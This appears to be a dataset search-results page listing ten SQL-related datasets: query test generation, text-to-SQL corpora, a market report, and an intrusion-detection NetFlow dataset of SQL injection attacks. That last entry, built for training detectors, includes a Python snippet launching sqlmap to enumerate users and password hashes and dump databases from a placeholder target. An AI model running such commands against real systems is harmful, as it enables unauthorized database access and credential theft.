10 datasets found
  1. Search-Based Test Data Generation for SQL Queries: Appendix

    • zenodo.org
    • data.niaid.nih.gov
    zip
    Updated Jan 24, 2020
    Cite: Jeroen Castelein; Maurício Aniche; Mozhan Soltani; Annibale Panichella; Arie van Deursen (2020). Search-Based Test Data Generation for SQL Queries: Appendix [Dataset]. http://doi.org/10.5281/zenodo.1166023
    Available download formats: zip
    Dataset updated: Jan 24, 2020
    Dataset provided by: Zenodo (http://zenodo.org/)
    Authors: Jeroen Castelein; Maurício Aniche; Mozhan Soltani; Annibale Panichella; Arie van Deursen
    License: Attribution 4.0 (CC BY 4.0), https://creativecommons.org/licenses/by/4.0/ (license information was derived automatically)

    Description

    The appendix of our ICSE 2018 paper "Search-Based Test Data Generation for SQL Queries".

    The appendix contains:

    • The queries from the three open-source systems we used in the evaluation of our tool (the industrial software system is not included in this appendix for privacy reasons).
    • The results of our evaluation.
    • The source code of the tool; the most recent version can be found at https://github.com/SERG-Delft/evosql.
    • The results of the tuning procedure we conducted before running the final evaluation.
  2. Data from: SQL Injection Attack Netflow

    • portalcienciaytecnologia.jcyl.es
    • portalcientifico.unileon.es
    • +3more
    Updated 2022
    + more versions
    Cite: Crespo, Ignacio; Campazas, Adrián (2022). SQL Injection Attack Netflow [Dataset]. https://portalcienciaytecnologia.jcyl.es/documentos/668fc461b9e7c03b01bdba14
    Dataset updated: 2022
    Authors: Crespo, Ignacio; Campazas, Adrián
    Description

    Introduction

    These datasets contain SQL injection attacks (SQLIA) as malicious NetFlow data. The attacks carried out are Union-query SQL injection and blind SQL injection, performed with the SQLMAP tool. The NetFlow traffic was generated using DOROTHEA (DOcker-based fRamework fOr gaTHering nEtflow trAffic). NetFlow is a network protocol developed by Cisco for collecting and monitoring network traffic flow data. A flow is defined as a unidirectional sequence of packets with some common properties that pass through a network device.

    Datasets

    The first dataset (D1) was collected to train the detection models; the second (D2) was collected using different attacks than those used in training, to test the models and ensure their generalization. Both datasets contain benign and malicious traffic and are balanced. The version of NetFlow used to build the datasets is 5.

    | Dataset | Aim      | Samples | Benign-malicious traffic ratio |
    |---------|----------|---------|--------------------------------|
    | D1      | Training | 400,003 | 50%                            |
    | D2      | Test     | 57,239  | 50%                            |

    Infrastructure and implementation

    Two sets of flow data were collected with DOROTHEA. DOROTHEA is a Docker-based framework for NetFlow data collection; it allows you to build interconnected virtual networks to generate and collect flow data using the NetFlow protocol. In DOROTHEA, network traffic packets are sent to a NetFlow generator with the ipt_netflow sensor installed. The sensor is a Linux kernel module using Iptables, which processes the packets and converts them into NetFlow flows. DOROTHEA is configured to use NetFlow v5 and to export a flow after it has been inactive for 15 seconds or active for 1,800 seconds (30 minutes).

    Benign traffic generation nodes simulate network traffic produced by real users, performing tasks such as searching in web browsers, sending emails, or establishing Secure Shell (SSH) connections. These tasks run as Python scripts, which users may customize or extend with their own. The network traffic is managed by a gateway that performs two main tasks: it routes packets to the Internet, and it forwards them to a NetFlow data generation node (packets received from the Internet are handled in the same way).

    The malicious traffic (SQLIA) was generated using SQLMAP, a penetration-testing tool that automates the detection and exploitation of SQL injection vulnerabilities. The attacks were executed on 16 nodes, each launching SQLMAP with the parameters in the following table.

    | Parameters | Description |
    |------------|-------------|
    | '--banner', '--current-user', '--current-db', '--hostname', '--is-dba', '--users', '--passwords', '--privileges', '--roles', '--dbs', '--tables', '--columns', '--schema', '--count', '--dump', '--comments' | Enumerate users, password hashes, privileges, roles, databases, tables and columns |
    | --level=5 | Increase the probability of a false positive identification |
    | --risk=3 | Increase the probability of extracting data |
    | --random-agent | Select the User-Agent randomly |
    | --batch | Never ask for user input, use the default behavior |
    | --answers="follow=Y" | Predefined answers to yes |

    Every node executed SQLIA against 200 victim nodes. The victim nodes deployed a web form vulnerable to Union-type injection attacks, connected to either a MySQL or a SQL Server database engine (50% of the victim nodes deployed MySQL and the other 50% SQL Server). The web service was accessible on ports 443 and 80, the ports typically used to deploy web services. The IP address space was 182.168.1.1/24 for the benign and malicious traffic-generating nodes and 126.52.30.0/24 for the victim nodes.

    The malicious traffic in the test sets was collected under different conditions. For D1, SQLIA was performed using Union attacks against the MySQL and SQL Server databases. For D2, blind SQLIA was performed against a web form connected to a PostgreSQL database, and the IP address spaces also differed from those of D1: 152.148.48.1/24 for the benign and malicious traffic-generating nodes and 140.30.20.1/24 for the victim nodes. The MySQL server was run with MariaDB version 10.4.12; Microsoft SQL Server 2017 Express and PostgreSQL version 13 were also used.
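    For illustration, a minimal sketch of how one attack node might launch SQLMAP with the parameters listed in the table above. The target URL and form parameter are hypothetical placeholders, not values taken from the dataset.

    ```python
    import subprocess

    # Hypothetical vulnerable endpoint; the real victim nodes served a web form on ports 80/443.
    TARGET = "http://victim.example/form.php?id=1"

    sqlmap_cmd = [
        "sqlmap", "-u", TARGET,
        # Enumeration flags from the parameter table above
        "--banner", "--current-user", "--current-db", "--hostname", "--is-dba",
        "--users", "--passwords", "--privileges", "--roles",
        "--dbs", "--tables", "--columns", "--schema", "--count", "--dump", "--comments",
        "--level=5",           # run a wider range of injection tests
        "--risk=3",            # allow riskier payloads that extract more data
        "--random-agent",      # select the User-Agent randomly
        "--batch",             # never ask for user input, use the default behavior
        "--answers=follow=Y",  # predefined answer to follow redirects
    ]

    subprocess.run(sqlmap_cmd, check=False)
    ```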

  3. Database Testing Tool Report

    • archivemarketresearch.com
    doc, pdf, ppt
    Updated Feb 9, 2025
    Cite: Archive Market Research (2025). Database Testing Tool Report [Dataset]. https://www.archivemarketresearch.com/reports/database-testing-tool-26309
    Available download formats: pdf, ppt, doc
    Dataset updated: Feb 9, 2025
    Dataset authored and provided by: Archive Market Research
    License: https://www.archivemarketresearch.com/privacy-policy
    Time period covered: 2025 - 2033
    Area covered: Global
    Variables measured: Market Size
    Description

    The global database testing tool market is anticipated to experience substantial growth in the coming years, driven by factors such as the increasing adoption of cloud-based technologies, the rising demand for data quality and accuracy, and the growing complexity of database systems. The market is expected to reach a value of USD 1,542.4 million by 2033, expanding at a CAGR of 7.5% during the forecast period of 2023-2033. Key players in the market include Apache JMeter, DbFit, SQLMap, Mockup Data, SQL Test, NoSQLUnit, Orion, ApexSQL, QuerySurge, DBUnit, DataFactory, DTM Data Generator, Oracle, SeLite, SLOB, and others.

    The North American region is anticipated to hold a significant share of the database testing tool market, followed by Europe and Asia Pacific. The increasing adoption of cloud-based database testing services, the presence of key market players, and the growing demand for data testing and validation are driving market growth in North America. Asia Pacific, on the other hand, is expected to experience the highest growth rate due to rapidly increasing IT spending, the emergence of new technologies, and the growing number of businesses investing in data quality management solutions.

  4. WikiSQL (Questions and SQL Queries)

    • kaggle.com
    zip
    Updated Nov 25, 2022
    Cite: The Devastator (2022). WikiSQL (Questions and SQL Queries) [Dataset]. https://www.kaggle.com/datasets/thedevastator/dataset-for-developing-natural-language-interfac
    Available download formats: zip (21491264 bytes)
    Dataset updated: Nov 25, 2022
    Authors: The Devastator
    License: https://creativecommons.org/publicdomain/zero/1.0/

    Description

    WikiSQL (Questions and SQL Queries)

    80654 hand-annotated questions and SQL queries on 24241 Wikipedia tables

    By Huggingface Hub [source]

    About this dataset

    A large crowd-sourced dataset for developing natural language interfaces for relational databases. WikiSQL is a dataset of 80654 hand-annotated examples of questions and SQL queries distributed across 24241 tables from Wikipedia.

    How to use the dataset

    This dataset can be used to develop natural language interfaces for relational databases. The data fields are the same across all splits; each file records the phase, question, table, and SQL query for every example.

    Research Ideas

    • This dataset can be used to develop natural language interfaces for relational databases.
    • This dataset can be used to develop a knowledge base of common SQL queries.
    • This dataset can be used to generate a training set for a neural network that translates natural language into SQL queries.

    Acknowledgements

    If you use this dataset in your research, please credit the original authors.

    Data Source

    License

    License: CC0 1.0 Universal (CC0 1.0) Public Domain Dedication. No copyright: you can copy, modify, distribute and perform the work, even for commercial purposes, all without asking permission. See Other Information.

    Columns

    File: validation.csv

    | Column name | Description |
    |:------------|:----------------------------------------------------------|
    | phase       | The phase of the data collection. (String)                 |
    | question    | The question asked by the user. (String)                   |
    | table       | The table containing the data for the question. (String)   |
    | sql         | The SQL query corresponding to the question. (String)      |

    File: train.csv (same columns as validation.csv)

    File: test.csv (same columns as validation.csv)
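    For illustration, a minimal sketch of loading these splits with pandas. It assumes the Kaggle zip has been downloaded and extracted so that train.csv, validation.csv, and test.csv sit in the working directory.

    ```python
    import pandas as pd

    # Load the three splits described above; each has the same columns.
    splits = {name: pd.read_csv(f"{name}.csv") for name in ("train", "validation", "test")}

    # Each row pairs a natural language question with its SQL query.
    example = splits["train"].iloc[0]
    print(example["question"])
    print(example["sql"])
    ```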

    Acknowledgements

    If you use this dataset in your research, please credit the original authors and Huggingface Hub.

  5. synthetic_text_to_sql

    • huggingface.co
    Cite: Gretel.ai, synthetic_text_to_sql [Dataset]. https://huggingface.co/datasets/gretelai/synthetic_text_to_sql
    Available download formats: Croissant (a format for machine-learning datasets; learn more at mlcommons.org/croissant)
    Dataset provided by: Gretel.ai
    License: Apache License, v2.0, https://www.apache.org/licenses/LICENSE-2.0 (license information was derived automatically)

    Description

    gretelai/synthetic_text_to_sql is a rich dataset of high quality synthetic Text-to-SQL samples, designed and generated using Gretel Navigator, and released under Apache 2.0. Please see our release blogpost for more details. The dataset includes:

    • 105,851 records partitioned into 100,000 train and 5,851 test records
    • ~23M total tokens, including ~12M SQL tokens
    • Coverage across 100 distinct… See the full description on the dataset page: https://huggingface.co/datasets/gretelai/synthetic_text_to_sql.
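    For illustration, a minimal sketch of loading the dataset with the Hugging Face datasets library; the split names follow the record counts quoted above, and field names should be checked against the dataset card.

    ```python
    from datasets import load_dataset

    # Pull the dataset from the Hugging Face Hub (100,000 train / 5,851 test records per the card).
    ds = load_dataset("gretelai/synthetic_text_to_sql")

    print(ds)               # shows the available splits and their sizes
    print(ds["train"][0])   # inspect one synthetic text-to-SQL sample
    ```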

  6. Supplementary data for "Enhancing Resource-based Test Case Generation For RESTful APIs with SQL Handling"

    • data.niaid.nih.gov
    Updated Jul 3, 2021
    Cite: Man Zhang; Andrea Arcuri (2021). Supplementary data for "Enhancing Resource-based Test Case Generation For RESTful APIs with SQL Handling" [Dataset]. https://data.niaid.nih.gov/resources?id=zenodo_5059927
    Dataset updated: Jul 3, 2021
    Dataset provided by: Kristiania University College
    Authors: Man Zhang; Andrea Arcuri
    License: Attribution 4.0 (CC BY 4.0), https://creativecommons.org/licenses/by/4.0/ (license information was derived automatically)

    Description

    Supplement to: Enhancing Resource-based Test Case Generation For RESTful APIs with SQL Handling

    In this repository, we provide the tests and their coverage reports (generated with IntelliJ's coverage tooling) that are used in the Discussion section of the paper.

  7. ReCiterAnalysis.sql.

    • plos.figshare.com
    txt
    Updated Jun 11, 2023
    Cite: Paul J. Albert; Sarbajit Dutta; Jie Lin; Zimeng Zhu; Michael Bales; Stephen B. Johnson; Mohammad Mansour; Drew Wright; Terrie R. Wheeler; Curtis L. Cole (2023). ReCiterAnalysis.sql. [Dataset]. http://doi.org/10.1371/journal.pone.0244641.s006
    Available download formats: txt
    Dataset updated: Jun 11, 2023
    Dataset provided by: PLOS (http://plos.org/)
    Authors: Paul J. Albert; Sarbajit Dutta; Jie Lin; Zimeng Zhu; Michael Bales; Stephen B. Johnson; Mohammad Mansour; Drew Wright; Terrie R. Wheeler; Curtis L. Cole
    License: Attribution 4.0 (CC BY 4.0), https://creativecommons.org/licenses/by/4.0/ (license information was derived automatically)

    Description

    Database model for storing output of Feature Generator API. Includes some sample data. (SQL)

  8. Data from: Automating pharmacovigilance evidence generation: Using large language models to produce context-aware SQL

    • search.dataone.org
    • data.niaid.nih.gov
    • +2more
    Updated Feb 4, 2025
    Cite: Jeffery Painter; Venkateswara Chalamalasetti; Raymond Kassekert; Andrew Bate (2025). Automating pharmacovigilance evidence generation: Using large language models to produce context-aware SQL [Dataset]. http://doi.org/10.5061/dryad.2280gb63n
    Dataset updated: Feb 4, 2025
    Dataset provided by: Dryad Digital Repository
    Authors: Jeffery Painter; Venkateswara Chalamalasetti; Raymond Kassekert; Andrew Bate
    Description

    Objective: To enhance the accuracy of information retrieval from pharmacovigilance (PV) databases by employing Large Language Models (LLMs) to convert natural language queries (NLQs) into Structured Query Language (SQL) queries, leveraging a business context document.

    Materials and Methods: We utilized OpenAI's GPT-4 model within a retrieval-augmented generation (RAG) framework, enriched with a business context document, to transform NLQs into executable SQL queries. Each NLQ was presented to the LLM randomly and independently to prevent memorization. The study was conducted in three phases, varying query complexity and assessing the LLM's performance both with and without the business context document.

    Results: Our approach significantly improved NLQ-to-SQL accuracy, increasing from 8.3% with the database schema alone to 78.3% with the business context document. This enhancement was consistent across low, medium, and high complexity queries, indicating the critical role of contextual ...

    The dataset comprises the test set of NLQs used in the paper, together with the Python scripts for the LLM processing, the R code for the statistical analysis of results, and a copy of the business context document and essential tables.

    # Automating Pharmacovigilance Evidence Generation: Using Large Language Models to Produce Context-Aware SQL

    https://doi.org/10.5061/dryad.2280gb63n

    Description of the data and file structure

    NLQ_Queries.xls contains the set of test NLQs along with the results of the LLM response in each phase of the experiment, as well as the complexity scores computed for each NLQ.

    The business context document is supplied as a PDF, together with the Python and R code used to generate our results. The essential tables used in Phase 2 and 3 of the experiment are included in the text file.
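    For illustration, a minimal sketch of the context-augmented NLQ-to-SQL prompting the paper describes, using the OpenAI Python client. The prompt wording, the schema, and the example question are placeholders, not the authors' exact setup; the supplied Python scripts contain the actual implementation.

    ```python
    from openai import OpenAI

    client = OpenAI()  # reads OPENAI_API_KEY from the environment

    # Placeholders: a snippet of business context and a toy schema, not taken from the dataset.
    business_context = "Adverse event cases are stored one row per case in adverse_events."
    schema = "CREATE TABLE adverse_events (case_id INT, drug TEXT, reaction TEXT, report_date DATE);"
    nlq = "How many adverse event cases were reported for drug X in 2023?"

    prompt = (
        "Using the business context and schema below, write a single SQL query "
        "that answers the question.\n\n"
        f"Business context:\n{business_context}\n\n"
        f"Schema:\n{schema}\n\n"
        f"Question: {nlq}\nSQL:"
    )

    response = client.chat.completions.create(
        model="gpt-4",
        messages=[{"role": "user", "content": prompt}],
        temperature=0,
    )
    print(response.choices[0].message.content)
    ```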

    Files and variables

    File: NLQ_Queries.xlsx

    Description: Contains all NLQ queries with the results of the LLM output and the pass/fail status of each.

    Column Definitions:

    Below are the column names in order with a detailed description.

    1. User NLQ: Plain text database query
    2. Phase_1: Pass or Fail status indicator "Pass, Partial, or Fa...
  9. MARIO MiLeadSafe Test

    • splitgraph.com
    Updated Jul 1, 2019
    Cite: michigan-gov (2019). MARIO MiLeadSafe Test [Dataset]. https://www.splitgraph.com/michigan-gov/mario-mileadsafe-test-fqds-wwf8/
    Available download formats: json, application/vnd.splitgraph.image, application/openapi+json
    Dataset updated: Jul 1, 2019
    Authors: michigan-gov
    Description

    Testing Dynamic Table Generation with column fieldTypes

    Splitgraph serves as an HTTP API that lets you run SQL queries directly on this data to power Web applications. For example:
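    A minimal, illustrative sketch of such a query using Python's requests library is shown below; the HTTP endpoint and the table name are assumptions, so consult the Splitgraph documentation for the actual API details.

    ```python
    import requests

    # Hypothetical table name within the repository; check the dataset page for the real one.
    SQL = """
    SELECT *
    FROM "michigan-gov/mario-mileadsafe-test-fqds-wwf8"."mario_mileadsafe_test"
    LIMIT 10
    """

    resp = requests.post(
        "https://data.splitgraph.com/sql/query/ddn",  # assumed HTTP SQL endpoint
        json={"sql": SQL},
        timeout=30,
    )
    resp.raise_for_status()
    print(resp.json())
    ```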

    See the Splitgraph documentation for more information.

  10. E-Commerce Data

    • kaggle.com
    zip
    Updated Aug 17, 2017
    Cite: Carrie (2017). E-Commerce Data [Dataset]. https://www.kaggle.com/datasets/carrie1/ecommerce-data
    Available download formats: zip (7548686 bytes)
    Dataset updated: Aug 17, 2017
    Authors: Carrie
    Description

    Context

    Typically, e-commerce datasets are proprietary and consequently hard to find among publicly available data. However, the UCI Machine Learning Repository has made this dataset, containing actual transactions from 2010 and 2011, publicly available. The dataset is maintained on their site, where it can be found under the title "Online Retail".

    Content

    "This is a transnational data set which contains all the transactions occurring between 01/12/2010 and 09/12/2011 for a UK-based and registered non-store online retail.The company mainly sells unique all-occasion gifts. Many customers of the company are wholesalers."

    Acknowledgements

    Per the UCI Machine Learning Repository, this data was made available by Dr Daqing Chen, Director: Public Analytics group. chend '@' lsbu.ac.uk, School of Engineering, London South Bank University, London SE1 0AA, UK.

    Inspiration

    Analyses for this dataset could include time series, clustering, classification and more.
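    For illustration, a minimal sketch of loading the data for a simple time-series analysis with pandas. It assumes the Kaggle zip has been extracted to data.csv and that the columns follow the UCI "Online Retail" layout (InvoiceDate, Quantity, UnitPrice, and so on); verify both against the downloaded file.

    ```python
    import pandas as pd

    # The Kaggle copy is commonly encoded as ISO-8859-1; adjust if the file differs.
    df = pd.read_csv("data.csv", encoding="ISO-8859-1", parse_dates=["InvoiceDate"])

    # Example: monthly revenue time series
    df["Revenue"] = df["Quantity"] * df["UnitPrice"]
    monthly = df.set_index("InvoiceDate")["Revenue"].resample("M").sum()
    print(monthly.head())
    ```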
